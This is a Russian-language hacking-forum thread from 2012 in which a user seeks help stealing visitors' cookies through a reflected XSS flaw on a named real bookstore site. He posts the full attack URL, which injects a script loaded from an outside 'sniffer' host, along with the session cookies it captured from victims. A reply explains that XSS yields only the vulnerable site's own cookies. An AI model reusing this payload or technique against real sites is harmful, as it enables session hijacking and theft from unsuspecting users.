ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Помогите с XSS (https://forum.antichat.xyz/showthread.php?t=8059616)

virtuoso_ 12.08.2012 01:00
Всем привет у меня проблема с XSS.
В общем нашол уязвимость http://www.kniga.ru/search/?q=">alert('Fucked') и решил воспользоваться снифферам hacker-pro. В итоге вышло вот этот код
Java highlight

Код:
http:
//www.kniga.ru/search/?q=">%3CSCRIPT type=text/javascript src=http://httpz.ru/aorthyjyqpgo.js>"
но когда кто нибудь переходит по этой ссылке выдаёт какую то чуш типа

source:

Код:
PHPSESSID
=daf50dd919af1d3cb4c6c059f1e1f6af
; _uc=8da8bdfd5980376cddefb157e6ca5a54; BITRIX_SM_SALE_UID=144347652; _ym_visorc=b.

Я что то не так делаю или что? На сколько помню раньше выдавала куки от mail, vk итд.
p.s А если на этом сниффере генерировать поссивный XSS в ссылку то вообще не чего не выдаёт.

mr.borocco 12.08.2012 01:00
PHPSESSID=daf50dd919af1d3cb4c6c059f1e1f6af; _uc=8da8bdfd5980376cddefb157e6ca5a54; BITRIX_SM_SALE_UID=144347652; _ym_visorc=b.

Это и есть куки от этого сайта.
При помощи xss с этого сайта, ты никак не вытащишь куки с vk.com или mail.ru)

virtuoso_ 12.08.2012 01:00
Всё я понял для каждого сайта свой XSS нужен.


Время: 17:05